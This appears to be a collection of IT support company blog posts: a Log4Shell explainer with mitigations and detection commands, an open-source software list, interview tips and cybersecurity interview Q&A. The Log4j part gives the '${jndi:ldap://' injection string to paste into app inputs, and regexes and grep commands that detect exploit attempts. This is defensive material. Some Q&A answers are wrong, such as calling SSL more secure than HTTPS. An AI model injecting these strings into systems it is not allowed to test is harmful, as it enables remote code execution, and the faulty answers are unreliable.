Our Vision

To give customers the most compelling IT Support experience possible.

Our Mission

Our mission is simple: make technology an asset for your business not a problem.

Our Values

We strive to make technology integrate seamlessly with your business so your business can grow. As your technology partner, when your business grows ours will grow with you, therefore, we will work hand in hand with you to support your growth.

Our Values

We develop relationship that makes a positive difference in our customers Business.

Our Values

We exibit a strong will to win in the marketplace and in every aspect of our Business

Log4j, Log4Shell or LogJam CVE- 2021-44228 RCE

Explaining #log4j for non-technical people, because the internet is burning down and y'all might want to know what's happening and why there's all this "${jndi:ldap" stuff out there.

Log4j is a popular logging library used in Java programming language. A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.

It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (firefox, chrome, edge... ), when you made the request, what page you accessed... and more!

So, this log4j library is used in A LOT of Java software, and there is approximately 3 billion devices that run Java. Quick math: that's huge.

Log4j is present in web servers, your phones, possibly on your smart fridge and plenty of other places...

A logger is supposed to just write down what happens to a hard drive, or send it to another server to store it. But in the case of log4j, there are a few things that are performed before writing anything. One of the things it does is look for patterns like ${something} and will try to replace it with another piece of information. It is used to add context, for example, ${date} would be replaced by today's date.(I have no idea if this example works, it's just to keep it simple)

So when there's a ${jndi: pattern, it will try to replace it. 

Except that this pattern triggers another mechanism that loads a resource from another computer, anywhere on the internet, we just have to tell it where to get the data from. This data can be a malicious software.

Due to some internal Java mechanism, this malicious software is automatically run on the computer that used log4j. This means that at this point hackers can make the targeted computer do (almost) whatever they want. This gets really bad because we don't need to know which computer to target.

Remember when I said the web servers logs what browser you use? Well, we can just tell it that our browser is "${jndi: [...]", and if it uses log4j it will trigger the vulnerability.

In real life that would be the same as giving the keys to your house to a random stranger you just saw pass in front of you, without even realizing it. So... yeah. #log4j the above simple explanation by Emy| eq in tweeter entropyquween_

So this is big and affected a lot of companies with servers confirmed to be vulnerable to Log4Shell attacks include the likes of Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase, and possibly thousands more.

Apache has released Log4j 2.15.0 to address the maximum severity CVE- 2021-44228 RCE vulnerability.  https://t.co/PzSkXJUxEi 

Workaround so far: Upgrade log4j or if you cannot upgrade then you can mitigate the RCE vulnerability by setting log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in JVM command line).

Note that this workaround only works for log4j2 version 2.10...2.15. If companies have an older library version of log4j2 (note that having an older version inside .jar archive does count) this workaround is not safe to use.

Mitigation for previous releases (>=2.10): set system property "log4j2.formatMsgNoLookups" to "true" or remove the JndiLookup class from the classpath.



Issue Found on update

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.


https://www.cve.org/CVERecord?id=CVE-2021-45046
 


And another issue discovered: Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a second bug disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware.

The new vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0.

More Details Here:
https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html

Detection:

A. Test and detect vulnerable applications. by John Hammond

https://log4shell.huntress.com/

The explain-like-I'm-five breakdown is that you simply copy and paste the generated JNDI syntax into _anything_ (typically form fields, application input boxes, logins, anything) and check if it received a connection. NO code is ran on other than making this connection to test.


B. How to test your apps for #log4shell vulnerability

1. Generate a DNS token https://t.co/vCzVG0O03i

2. Wrap that token in 

Prefix: ${jndi:ldap://

Suffix: /a}

3. Use that value in search forms, profile data, settings etc. of your apps

4. Get notified when you triggered a reaction https://t.co/1w6jmF9qgy


C. I know that using regex is dumb and shit, but it's just first-line defense. This one I is capable to detect obfuscated payloads and should produce very few false positives:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*(?1)}*|[jndi:(ldap|rm)]('|"|`)*}*){9,10}


D. If you are looking for Vulnerable Software on Linux, Docker Container, Kubernetes Pods the following command may help you.

find -name "*.jar" -exec sh -c 'unzip -l "{}" | grep -i --color=always JndiLookup.class' ; -print

find -name ".jar" -exec sh -c 'unzip -l "{}" | grep -i --color=always log4j-core-2..jar' ; -print

E. A quick and dirty way by Jay Minton you can find his other awesome work here https://www.jaiminton.com/#

 To find jar files that have a JndiLookup.class in PowerShell (change drive).

gci 'C:\' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path

Running the following in PowerShell as Admin on Windows should mitigate the issue for any instances >=2.10

[Environment]::SetEnvironmentVariable("LOG4J_FORMAT_MSG_NO_LOOKUPS","true","Machine")


For forensic examiners, it's not known how practical exploitation is, but both Cellebrite BlackLight and Autopsy use components that leverage the vulnerable log4j class.

Elasticsearch for BlackLight (possibly inspector also), and Apache Solr for Autopsy keyword searching.


F. You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

This command searches for exploitation attempts in compressed files in folder /var/log and all sub folders

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'

Grep / Zgrep - Obfuscated Variants

These commands cover even the obfuscated variants but lack the file name in a match.

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns):'" \;

This command searches for exploitation attempts in compressed files in folder /var/log and all sub folders

sudo find /var/log/ -name "*.log.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'"  \;

Guidance from Microsoft: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

Microsoft Sentinel queries Possible exploitation of Apache log4j component detected

https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml

This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache.  Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.

Cryptocurrency miners EXECVE : This query hunts through EXECVE Syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded.  It returns a table of suspicious command lines.

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability:  https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell


CURATED Intel: IOC and report https://github.com/curated-intel/Log4Shell-IOCs

https://crowdsec.net/log4j-tracker/

Other info:




This repo seems to have a good few high traffic sites being vulnerable for CVE- 2021-44228   https://github.com/YfryTchsGD/Log4jAttackSurface 

Customers can run commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE- 2021-44228 can be found here  https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

PoC:  https://t.co/yShp4iRTxJ

Patch:  https://t.co/rVSq2EZfoT

Technical breakdown:  https://t.co/QWRkh6rk4y

Crowdstrike blog https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/

 And more

https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217


https://gist.github.com/yt0ng/8a87f4328c8c6cde327406ef11e68726


https://urlhaus.abuse.ch/browse/tag/log4j/


Fortinet  detection solution https://community.fortinet.com/t5/FortiAnalyzer/Technical-Tip-Using-FortiAnalyzer-to-detect-activities-related/ta-p/201026


Try hackme box for practice : https://tryhackme.com/room/solar


Happy Hunting.



Best Free Open Source Software of 2022 for your Home or Small Business

The term OPEN SOURCE refers to software whose source code is freely available to download, edit, use and share, with no copyright restrictions and that's why we love it.

You will find open source versions of almost every software imaginable - from Operating systems, office suites, media to accounting, and productivity. With that in mind, here's our pick of the very best open-source software.

Operating System: Linux

Let's start with the main thing you need first is an Operating System for your PC or Laptop. In the past 10 years, the gap between the features in all the major operating systems has become smaller and smaller. Linux operating systems aren't just for geeks and nerds. Anyone can install Linux and use it for their everyday computing needs including browsing the web, watching Netflix, typing letters, sorting home finances, video editing, photo editing, and managing music collections. There is a lot of option to choose from for everyone from Novice to System Administrator to  Hackers and Security professionals everyone loves Linux as their OS.

Ubuntu: One of the most popular distros for good reason, Ubuntu is an open-source software operating system that runs from the desktop, to the cloud, to all your internet connected things.

Ubuntu is officially released in three editions: Desktop, Server, and Core (for the internet of things devices and robots). Ubuntu is a popular operating system for cloud computing. Ubuntu is released every six months, with long-term support (LTS) releases every two years.  Download form here

 

Linux Mint is a great ‘default’ distro for new Linux users, as it comes with a lot of the software you’ll need when switching from Mac or Windows, such as LibreOffice, the favored productivity suite of Linux users. It also has better support for proprietary media formats, allowing you to play videos, DVDs, and MP3 music files out of the box. Why not give it a go today.  


Office software: LibreOffice

The next is you required your productivity tool and here comes to the rescue. LibreOffice is a powerful office suite – its clean interface and feature-rich tools help you unleash your creativity and enhance your productivity.  LibreOffice is a full suite of workplace software package, together with wonderful apps for text documents, spreadsheets, presentations, and databases. These are all absolutely compatible with the most recent Microsoft file formats, thus you’ll haven't any hassle sharing files that employ with users of Word, Excel, PowerPoint, and Access.

LibreOffice includes several applications that make it the most powerful Free and Open Source office suite on the market. You can download it form clicking on their official link here .

 

Email client: Mozilla Thunderbird

Email is a key part of our everyday life Thunderbird is a free and open-source email, news feed, chat, and calendaring client, that’s easy to set up and customize. One of the core principles of Thunderbird is the use and promotion of open standards - this focus is a rejection of our world of closed platforms and services that can’t communicate with each other. We want our users to have freedom and choice in how they communicate. You can download it form clicking on their official link here .


Web browser: Mozilla Firefox

Download Mozilla Firefox, a free Web browser. Firefox is created by a global non-profit dedicated to putting individuals in control online. Firefox is available for Microsoft Windows, macOS, Linux, BSD, illumos, and Solaris operating systems. Its sibling, Firefox for Android, is also available.You can download it form clicking to their official link here even you can download in your onw language .

 

Accounting / Small Business Accounting: GnuCash

GnuCash is personal and small-business financial-accounting software, freely licensed under the GNU GPL and available for GNU/Linux, BSD, Solaris, Mac OS X, and Microsoft Windows. Designed to be easy to use, yet powerful and flexible, GnuCash allows you to track bank accounts, stocks, income, and expenses. As quick and intuitive to use as a checkbook register, it is based on professional accounting principles to ensure balanced books and accurate reports. Download here

Clean Your System and Free Disk Space: BleachBit

When your computer is getting full, BleachBit quickly frees disk space. When your information is only your business, BleachBit guards your privacy. With BleachBit you can free cache, delete cookies, clear Internet history, shred temporary files, delete logs, and discard junk you didn't know was there. Designed for Linux and Windows systems, it wipes clean thousands of applications including Firefox, Internet Explorer, Adobe Flash, Google Chrome, Opera, Safari, and more. Beyond simply deleting files, BleachBit includes advanced features such as shredding files to prevent recovery, wiping free disk space to hide traces of files deleted by other applications, and vacuuming Firefox to make it faster. Better than free, BleachBit is open source. Download link


Password manager: KeePass Password Safe

Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your website's FTP password, online passwords (like website member account), etc. The list is endless. Also, you should use different passwords for each account. Because if you use only one password everywhere and someone gets this password you have a problem... A serious problem. The thief would have access to your e-mail account, website, etc. Unimaginable.

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish). Download link



Safeguard Your Data/ Disk Encryption: 

DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. DiskCryptor is file and drives encryption software with all the whistles and bells you will ever need. Just like in TrueCrypt, DiskCrypror can encrypt any of your files, system drives, and other external devices like CD’s and thumb drives. Moreover, DiskCryptor can encrypt your data with different encryption algorithms like AES (Advanced Encryption Standard), Twofish, Serpent, and also uses a combination of cascaded algorithms for increased security. If you are previously using TrueCrypt for your encryption purposes, then DiskCryptor is the closest free option available with active development and support.

Media player: VLC Media Player

VLC media player (commonly known as VLC) is a free and open-source, portable, cross-platform media player and streaming media server.VLC offers everything you could need from a media player - comprehensive format support, streaming, downloading, and much more download here

 

Photo editor: GIMP

GIMP is a cross-platform image editor available for GNU/Linux, OS X, Windows, and more operating systems. It is free software, you can change its source code and distribute your changes. Whether you are a graphic designer, photographer, illustrator, or scientist, GIMP provides you with sophisticated tools to get your job done. You can further enhance your productivity with GIMP thanks to many customization options and 3rd party plugins.Download Link

Video editor: Shotcut

Shotcut is a free, open-source, cross-platform video editor. Shotcut is a free, open-source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k. More features and download link here

Audio editor: Audacity

Free, open-source, cross-platform audio software. Audacity is an easy-to-use, multi-track audio editor and recorder for Windows, Mac OS X, GNU/Linux  Download Here


What did we miss?

Is there an open-source application that we missed? These are just a few of the best open-source/ free software I use for my personal use. They offer terrific value and since most of them are open source they are more secure for your privacy and protection in this digital age. 

We think of this as a work in progress, so if you believe there is software that should be added to this list, please let us know in the comments section below.

If you like this post feel free to re and if you want to connect with me just add me up on LinkedIn  Faysal Hasan https://au.linkedin.com/in/faysalhasan

Interview Tips, Preparation and Behavioral/Competency Based Interviews


 Interview Tips


Congratulations on securing an interview!

This is your opportunity to demonstrate your personal attributes, your strengths, personality, your ability to communicate and how you react under pressure.  Here are some tips to assist you in selling your assets:

Develop Rapport

To ensure effective communication, it is very important to develop a good rapport with the person interviewing you.  Of course, this is sometimes difficult, particularly if you “really want the job”.  However, you must relax – get that high-pitched or tense tone out of your voice – and appear to be calm and self-assured at all times.

One of the simplest ways of helping this is to smile a lot.  Yes, when appropriate, smile.  Not a grin but a genuine, warm smile.  Ask yourself seriously: do you smile during the course of conversation?

Ask Good Questions

This is a big tip!  Don’t just tell the interviewer how wonderful you are and how good your achievements have been.  Demonstrate that you have done your homework that you are really listening and you understand what’s going on.  You can do this by asking relevant questions about the department and the job in question.  Taking an interest in the big picture will have a positive influence on the interviewer.  If, in the limited time of an interview, you can ask one or two questions that actually make the interviewer think about the answer, or better still, maybe cover issues they hadn’t even thought of, then you really are on the home stretch.


Preparation Will Make or Break the Interview!


Preparation is the first essential step towards a successful interview. 

Be prepared to answer a couple of standard questions such as:

Ø   What do you want to be doing in your career five years from now?  Ten years from now?
Ø   What style of management gets the best from you?  Who was your best boss?  Why?
Ø   What have you learnt from some of the jobs, you have held?  What did you enjoy the most?  What did you enjoy the least?
Ø   What have you done that shows initiative in your career?
Ø   What are you looking for in your next role?

“Open probe” questions are different because they strike right at the heart of issues and require more than a yes/no answer.

Ø   Why do you want to change roles?
Ø   Give positive answer – confident, coherent and logical explanations are critical to the interview process.

Ø   What is your greatest strength/weakness?
Ø   Have some answers ready – even weaknesses can be presented positively, especially if you are doing something about them.

Ø   Why should you be successful in gaining this role?
Ø   Here’s a chance to review your strengths and show how you can make a big contribution.  Sell your benefits, not your features. 

Ø   How do you react to criticism?


Behavioral/Competency Based Interviews


Behavioral interviewing is based within the premise that past behavior is the best indicator of future behavior.  With a set of competencies identified beforehand, the interviewer will ask you to relate specific examples or situations where you have demonstrated a particular competency in the past.

For example, let’s say problem solving is a competency required for the role.  The interviewer may ask something like:

“Tell me about a time where you have solved a business problem?  What was the situation?  What was the outcome?”

The best way to answer these questions is to describe a specific example that demonstrates your ability in that area using the “STAR” technique to structure your response:

S – Situation
T – Task
A – Action
R – Result

So in answering the above question, an appropriate response may go something like this:

“The situation at XYZ Company when I first joined was that all employees had authority to speak to the media.  This created problems such as inconsistent message, inaccurate/untimely information release and an array of other undesirable consequences for the company’s image.  My task as Media & PR Manager was to build and maintain a positive corporate image so the action I took was to immediately implement a policy whereby only four nominated executives had authority to deal with the media and that all media and PR activity initiated outside my team was to be signed off by me.  I took the time to gain the buy-in of management and then all employees so that everyone was happy to adhere to the new policies.  The result was great – no more embarrassing situations and a far more positive attitude to our brand as evidenced by a recent independent survey”.

This answer clearly demonstrates the candidate’s ability to decisively and collaboratively solve a business problem.  The answer is also very succinct which means the interviewer is more likely to tune in to the entire response.  The interviewer can then drill down further to obtain more detail around the “how’s” and “why’s” of the example.

Great answers to interview questions are:

Ø   Relevant
Ø   Succinct
Ø   Able to show clearly what you did and how you did it
Ø   Delivered with an appropriate level of energy and enthusiasm
Ø   Not “waffly”!

Closing the Interview


You have come to the end of the interview.  Don’t make the mistake and nervously mumble “Thank You” and leave.  Always be prepared to ask questions at the end of the interview – have at least one question that indicates you’ve been listening.  Of course, this is also a good opportunity to let the interviewer know that you are terribly keen on the job.  Don’t worry about appearing too eager – as long as you’re being yourself.  The interviewer is looking for an enthusiastic person, not someone who hasn’t decided if this is the right career for them.

If you have answered the two questions uppermost in the interviewer’s mind – “Why are you interested in the job?” and “What can you offer and can you do the job?” – You have done all you can.


Good luck – and enjoy!

Cyber Security Interview questions

Q1) Define Cybersecurity?

Ans. Cybersecurity refers to the protection of internet-connected systems such as software, 

hardware, electronic data, etc., from cyber attacks. In a computing text, it is referred to as protection against unauthorized access.

Q2) What is Cryptography?

Ans. Cryptography is a method to transform and transmit the confidential data in an encoded way to 

protect the information from third parties for whom data is not authorized.

Q3) What is the difference between Threat, Vulnerability, and Risk?

Ans.•Threat: Someone with the potential to cause harm by damaging or destroying the official data to a system or organization.

Ex: Phishing attack

Vulnerability: It refers to weaknesses in a system that makes threat outcomes more possible and even more dangerous.

Ex: SQL injections, cross-site scripting

Risk: It refers to a combination of threat probability and impact/loss. In simple terms, it is related to potential damage or loss when threat exploits the vulnerability.

•Threat probability * Potential loss = Risk

Q4) What is Cross-Site Scripting and how it can be prevented?

Ans. Cross-Site Scripting is also known as a client-side injection attack, which aims at executing malicious scripts on a victim’s web browser by injecting malicious code.

The following practices can prevent Cross-Site Scripting:

•Encoding special characters

•Using XSS HTML Filter

•Validating user inputs

•Using Anti-XSS services/tools

Q5) What is the difference between IDS and IPS?

Ans.Intrusion Detection Systems (IDS) 

It only detects intrusions but unable to prevent 

intrusions.It's a monitoring system and it needs human or another system to look at the results.

Intrusion Prevention Systems (IPS)

It detects and prevents intrusions.It’s a control system.

It needs a regularly updated database with the latest 

threat data.

Q6) What is a Botnet?

Ans.•A Botnet is a group of internet-connected devices such as servers, PCs, mobile devices, etc., that are affected and controlled by malware.

•It is used for stealing data, sending spam, performing distributed denial-of-service attack (DDoS attack), and more, and also to enable the user to access the device and its connection.

Q7) What is a CIA triad?

Ans. CIA (confidentiality, integrity, and availability) triad is a model designed to handle policies for information security within an organization.

Confidentiality - A collection of rules that limits access to information.

Integrity - It assures the information is trustworthy and reliable.

Availability - It provides reliable access to data for authorized people.

Q8) Symmetric Vs Asymmetric encryption.

Ans.Purpose: Symmetric Encryption Uses a single key to encrypt and decrypt information.

Speed: Symmetric encryption performs faster

Algorithms: AES, RC4, DES, QUAD, 3DES, Blowfish etc

Asymmetric Encryption: Uses a pair of public and private keys to encrypt and decrypt information

Purpose Preferred for transferring huge data Mostly used for exchanging secret keys safely.

Asymmetric encryption performs slower compared to symmetric encryption.

Algorithm: Diffie-Hellman and RSA 

Q9) What is the difference between hashing and encryption?

Ans. Both hashing and encryption are used to convert readable data into an unreadable format. The significant difference is that encrypted data can be transformed into original data by decryption, whereas hashed data cannot be processed back to the original data.

Q10) What is two-factor authentication and how it can be implemented for public websites?

Ans.•Tw0-factor authentication is also referred to as dual-factor authentication or two-step verification where the user provides two authentication factors for protecting both user credentials and resources while accessing.

•The two-factor authentication can be implemented on public websites such as Twitter, Microsoft, LinkedIn, and more for enabling another protection on your already protected account with a password.

•For enabling this double factor authentication, you can easily go to settings and then manage security settings.

Q11) What is the use of a firewall and how it can be implemented?

Ans. A firewall is a security system used to control and monitor network traffic. It is used for protecting the system/network from malware, viruses, worms, etc., and secures unauthorized access from a private network.

The steps required to set up and configure the firewall are listed below:

•Change the default password for a firewall device.

•Disable the remote administration feature.

•Configure port forwarding for specific applications to function correctly, such as an FTP server or a web server.

•Firewall installation on a network with an existing DHCP server can cause errors unless its firewall’s DHCP is disabled.

•Make sure the firewall is configured to robust security policies.

Q12) What is the difference between vulnerability assessment and penetration testing?

•The terms Vulnerability assessment and penetration testing are both different, but serve an essential function of protecting network environment.

Vulnerability Assessment: It’s a process to define, detect, and prioritize the vulnerabilities in computer systems, network infrastructure, applications, etc., and gives the organization with the required information to fix the flaws.

Penetration Testing: It is also called as pen testing or ethical hacking. It’s a process of testing a network, system, application, etc.to identify vulnerabilities that attackers could exploit. In the context of web application security, it is most widely used to augment a web application firewall (WAF).

Q13) What is the difference between stored and reflected XSS?

Ans.•Stored XSS Attacks - The attacks where the injected scripts are stored on the target servers permanently. In this, the victim retrieves the malicious script from the server when requests the stored information.

Reflected XSS Attacks - In this, the user has to send the request first, then it will start running on the victim’s browser and reflects results from browser to the user who sent the request.

Q14) What is a three-way handshake process?

Ans. A three-way handshake process is used in TCP (Transmission Control Protocol) network for transmission of data in a reliable way between the host and the client.It’s called three-way handshake because three segments are exchanged between the server and the client.

SYN : The client wants to establish a connection with the server, and sends a segment with SYN(Synchronize Sequence Number) to the server if the server is up and has open ports.

SYN + ACK : The server responds to the client request with SYN-ACK signal bits set if it has open ports.

ACK : The client acknowledges the response of a server and sends an ACK(Acknowledgment) packet back to the server.

Q15) What are HTTP response codes?

Ans. HTTP response codes display whether a particular HTTP request has been completed.

•1xx (Informational) - The request has been received, and the process is continuing.

•2xx (Success) - The request was successfully received and accepted.

•3xx (Redirection) - Further action must be taken to complete it.

•4xx (Client Error) - Request cannot be fulfilled or has incorrect syntax.

•5xx (Server Error) - Server fails to fulfill the request.

Q16) What are the techniques used in preventing a Brute Force Attack?

Ans. Brute Force Attack is a trial and error method that is employed for application programs to decode encrypted data such as data encryption keys or passwords using brute force rather than using intellectual strategies. It’s a way to identify the right credentials by repetitively attempting all the possible methods.

Brute Force attacks can be avoided by the following practices:

•Adding password complexity: Include different formats of characters to make passwords stronger.

•Limit login attempts: set a limit on login failures.

•Two-factor authentication: Add this layer of security to avoid brute force attack.

Q17) List the common types of cybersecurity attacks.

Ans. The following are the most common types of cybersecurity attacks:

•Malware  •SQL Injection Attack •Cross-Site Scripting (XSS) •Denial-of-Service (DoS)

•Man-in-the-Middle Attacks •Credential Reuse •Phishing •Session Hijacking

Q18) Define data leakage and its types?

Ans. Data Leakage refers to the illegal transmission of data to an external destination or unauthorized entity within an organization. It can transfer data either physically or electronically. It usually occurs via the web, emails, and mobile data storage devices.

Types of data leakage:

1. The Accidental Breach - Majority of data leakage incidents are accidental.

Ex: An entity may choose the wrong recipient while sending confidential data.

2. The Disgruntled or ill-intentioned Employee - The authorized entity sends confidential data to an unauthorized body.

3. Electronic Communications with Malicious Intent - The problem is all the electronic mediums are capable of file transferring and external access sources over the internet.

Q19) What is the use of Traceroute?

Ans. A Traceroute is a network diagnostic tool, used for tracking the pathway of an IP network from source to destination. It records the period of each hop the packet makes while its route to its destination.

Q20) How to prevent CSRF attacks?

Ans. CSRF is referred to as Cross-site Request Forgery, where an attacker tricks a victim into performing actions on their behalf.

CSRF attacks can be prevented by using the following ways:

•Employing the latest antivirus software which helps in blocking malicious scripts.

•While authenticating to your banking site or performing any financial transactions on any other website do not browse other sites or open any emails, which helps in executing malicious scripts while being authenticated to a financial site.

•Never save your login/password within your browser for financial transactions.

•Disable scripting in your browser.

Q21) What is port scanning?

Ans. A port scanning is an application designed for identifying open ports and services accessible on a host network. Security administrators mostly utilize it for exploiting vulnerabilities, and also by hackers for targeting victims.

Some of the most popular port scanning techniques are listed below:

•Ping scan  •TCP connect •TCP half-open •Stealth scanning – NULL, FIN, X-MAS •UDP


Q22) What is the need for DNS monitoring?

Ans.

•DNS (Domain Name System) is a service that is used for converting user-friendly domain names into a computer-friendly IP address. It allows website under a particular domain name which is easy to remember.

•DNS monitoring is nothing but monitoring DNS records to ensure does it route traffic properly to your website, electronic communication, services, and more.

Q23) What is the difference between hashing and salting?

Ans.

•Hashing is majorly used for authentication and is a one-way function where data is planned to a fixed-length value.

•Salting is an extra step for hashing, where it adds additional value to passwords that change the hash value created.

Q24) How to prevent ‘Man-in-the-Middle Attack’?

Ans. The following practices prevent the ‘Man-in-the-Middle Attacks’:

•Have a stronger WAP/WEP Encryption on wireless access points avoids unauthorized users.

•Use a VPN for a secure environment to protect sensitive information. It uses key-based encryption.

•Public key pair based authentication must be used in various layers of a stack for ensuring whether you are communicating the right things are not.

•HTTPS must be employed for securely communicating over HTTP through the public-private key exchange.

Q25) What are the common methods of authentication for network security?

Ans.

•Biometrics - It is a known and registered physical attributes of a user specifically used for verifying their identity.

•Token - A token is used for accessing systems. It makes more difficult for hackers to access accounts asthey have long credentials.

•Transaction Authentication - A one time pin or password is used in processing online transactions through which they verify their identity.

•Multi-Factor Authentication - It’s a security system that needs more than one method of authentication.

•Out-of-Band Authentication - This authentication needs two different signals from two different channels or networks. It prevents most of the attacks from hacking and identity thefts in online banking.

Q26) Which is more secure SSL or HTTPS?

Ans.

•SSL (Secure Sockets Layer) is a secure protocol which provides safer conversations between two or more parties across the internet. It works on top of the HTTP to provide security.

•HTTPS (Hypertext Transfer Protocol Secure) is a combination of HTTP and SSL to provide a safer browsing experience with encryption.

•In terms of security, SSL is more secure than HTTPS.

Q27) What is the difference between black hat, white hat, and grey hat hackers?

Ans.•Black-hat hacker is a person who tries to obtain unauthorized access into a system or a network to steal information for malicious purposes.

•White-hat hackers are also known as ethical hackers; they are well-versed with ethical hacking tools, methodologies, and tactics for securing organization data. They try to detect and fix vulnerabilities and security holes in the systems. Many top companies recruit white hat hackers.

•Grey hat hacker is a computer security expert who may violate ethical standards or rules sometimes, butdo not have malicious intent of black hat hacker.

Q28) What is cognitive security?

Ans. Cognitive security is one of the applications of AI technologies that is used explicitly for identifying threats and protecting physical and digital systems based on human understanding processes.

Self-learning security systems use pattern recognition, natural language processing, and data mining to mimic the human brain.

Q29) What is phishing and how it can be prevented?

Ans. Phishing is a malicious attempt of pretending oneself as an authorized entity in electronic communication for obtaining sensitive information such as usernames, passwords, etc. through fraudulent messages and emails.

The following practices can prevent phishing:

•Use firewalls on your networks and systems.

•Enable robust antivirus protection that has internet security.

•Use two-factor authentication wherever possible

•Maintain adequate security.

•Don't enter sensitive information such as financial or digital transaction details on the web pages that youdon't trust.

•Keep yourself updated with the latest phishing attempts.

Q30) What is SQL injection and how it can be prevented?

Ans. SQL Injection (SQLi) is a type of code injection attack where it manages to execute malicious SQL statements to control a database server behind a web application. Attackers mostly use this to avoid application security measures and thereby access, modify, and delete unauthorized data.

The following ways will help you to mitigate or prevent SQL injection attacks:

•Include Prepared Statements (with Parameterized Queries)

•Use Stored Procedures

•Validate user input

•Hide data from the error message

•Update your system

•Store database credentials separate and encrypted

•Disable shell and any other functionalities you don’t need

 

Q31) How will you keep yourself updated with the latest cybersecurity news?

Ans. The following ways will help you to keep up with the latest cybersecurity updates:

•Follow news websites and blogs from security experts.

•Browse security-related social media topics.

•Check vulnerability alert feeds and advisory sites.

•Attend cybersecurity live events.

 

Q32) What is a DDOS attack and how to stop and prevent them?

Ans. A DDOS (distributed denial-of-service ) is a malicious attempt of disrupting regular traffic of a network by flooding with a large number of requests and making the server unavailable to the appropriate requests. The requests come from several unauthorized sources and hence called distributed denial of service attack.

The following methods will help you to stop and prevent DDOS attacks:

•Build a denial of service response plan

•Protect your network infrastructure

•Employ basic network security

•Maintain strong network architecture

•Understand the Warning Signs

•Consider DDoS as a service

 

Q33) What do you understand by compliance in Cybersecurity?

Ans.

•Compliance means living by a set of standards set by organization/government/independent party.

•It helps in defining and achieving IT targets and also in mitigating threats through processes like 

vulnerability management.

 

Q34) What is the use of Patch Management?

Ans.

•The purpose of patch management is to keep updating various systems in a network and protect them against malware and hacking attacks.

•Many enterprise patch management tools manage the patching process by installing or deploying agentson a target computer, and they provide a link between centralized patch server and computers to be patched.

Q35) What is the difference between a false positive and false negative in IDS?

Ans.

•A false positive is considered to be a false alarm and false negative is considered to be the most complicated state.

•A false positive occurs when an IDS fires an alarm for legitimate network activity.

•A false negative occurs when IDS fails to identify malicious network traffic.

Compared to both, a false positive is more acceptable than false negative as they lead to intrusions without getting noticed.

Q36) what is the difference between the Red team and Blue team?

Ans.

•Red team and blue team refers to cyber warfare. Many organizations split the security team into two groups as red team and blue team.

•The red team refers to an attacker who exploits weaknesses in an organization's security.

•The blue team refers to a defender who identifies and patches vulnerabilities into successful breaches.

Q37) Explain System hardening?

Ans.

•Generally, system hardening refers to a combination of tools and techniques for controlling vulnerabilities in systems, applications, firmware, and more in an organization.

•The purpose of system hardening is to decrease the security risks by reducing the potential attacks and condensing the system’s attack surface.

The following are the various types of system hardening:

1.Database hardening

2.Operating system hardening

3.Application hardening

4.Server hardening

5.Network hardening

Q38) What is a cybersecurity risk assessment?

Ans. A cybersecurity risk assessment refers to detecting the information assets that are prone to cyber attacks(including customer data, hardware, laptop, etc.) and also evaluates various risks that could affect those assets.

